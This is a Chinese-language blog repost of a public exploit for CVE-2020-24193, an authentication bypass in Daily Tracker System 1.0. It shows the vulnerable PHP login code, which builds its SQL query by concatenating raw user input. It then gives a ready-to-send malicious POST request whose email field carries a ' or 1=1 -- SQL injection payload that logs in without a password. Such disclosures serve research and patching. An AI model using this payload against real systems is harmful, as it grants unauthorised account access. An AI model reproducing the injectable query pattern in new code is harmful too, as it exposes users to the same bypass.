Daily Tracker System 1.0-身份验证绕过漏洞—Hack之路

Daily Tracker System 1.0-身份验证绕过漏洞
#Exploit作者:Adeeb Shah(@ hyd3sec)和Bobby Cooke(boku)
#CVE ID:CVE-2020-24193
#供应商主页:https://www.sourcecodester.com/
#软件链接:https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
#版本:1.0
#已测试:Windows 10 Pro 1909(x64_86)+ XAMPP 7.4.4

#易受攻击的源代码

if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where  Email='$email' && Password='$password    ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
 $_SESSION['detsuid']=$ret['ID'];
 header('location:dashboard.php');
}
 else{
 $msg="Invalid Details.";
 }
}
?>
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/14/daily-tracker-system-1-0-%e8%ba%ab%e4%bb%bd%e9%aa%8c%e8%af%81%e7%bb%95%e8%bf%87%e6%bc%8f%e6%b4%9e-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注